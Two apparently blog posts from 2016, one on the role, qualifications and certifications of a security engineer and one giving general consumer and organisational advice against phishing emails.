So the question is: what is a security engineer, and what skills are required to be one?

A typical responsibility for a security engineer includes installing and maintaining hardware and software (firewalls, antivirus, and intrusion detection) to reduce security risks within an organization.

The security engineer role is about building and maintaining IT security solutions that help organizations to stay protected against cyber threats. This differs from a security analyst, who is concerned with organizational awareness, policy and governance risk management.

Skills and Qualification:

To become a security engineer, in terms of qualification, an employee should have a bachelor’s degree in a technical subject such as computer science, cyber security, mathematics, engineering or science.

Experience in network security is beneficial, and certification with industry-standard technologies like Juniper, Blue Coat, Checkpoint, Palo Alto Networks, Cisco IOS or Sophos Enterprise Portal would be a bonus. There is also a range of internationally recognized certifications from organizations such as CEH, CISSP and (ISC).

Tips:

A tip for becoming a security engineer is to start learning new skills straight away. Watch YouTube videos, subscribe to security blogs and keep up to date on recent hacks in the news.

Remember, you don't need a Masters in Cyber Security or ten years' experience to become a security engineer. An enthusiastic attitude and an understanding of the main industry challenges can take you a long way.

Moreover, you can also take practical security courses to gain some practical knowledge. A security engineer requires both a practical and a theoretical background in the security measures that are used to secure an organization and its information systems.


~ Sunday, 28 August 2016 0 comments

How to win against Phishing attacks?

A Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has.

Phishing attacks are launched by an attacker from a remote location using sources that are authentic or that look authentic. This leads users to click on the attacker's links and disclose their personal information.



Attackers can run a Phishing campaign that takes only five minutes to put together, and within 25 minutes they get access to corporate data that can lead to an organization-wide breach.

There are some ways to win against these types of attacks.

Check source of Incoming email:

Your bank or other financial institution will never ask you to give your financial details, passwords or other personal information by email. Never respond to these emails, and in case of any doubt, call your bank for clarification.

Never follow your bank website link from emails:

You should manually log on to your bank’s website instead of following links provided in an email. Such a link may take you to a dummy page that an attacker has created to steal your login information.

Enhance security of your computer:

Being observant is the key to identifying suspicious activities and protecting your computer, but you should also install a good antivirus solution to block these types of attacks. In addition, keep your system and antivirus updated to detect the latest attacks and malware.

Serve your sensitive data over private and protected websites only:

There are many websites that are not secured and that collect personal details without any security. Avoid such websites, and make sure that you are connected to a private and secured network and computer before sending your personal and classified information.

Have any doubt? Don’t risk it:

If you have any doubt, because the website is acting abnormally or redirecting you towards unnecessary pages, stop there and don’t risk your information. This is the most basic technique to avoid Phishing attacks.

These are some of the basic techniques to overcome and win against Phishing attacks, but organizations also need to create network strategies that restrict users to accessing only trusted websites. Additionally, emails should be monitored continuously to block malicious links.


~ Friday, 26 August 2016 0 comments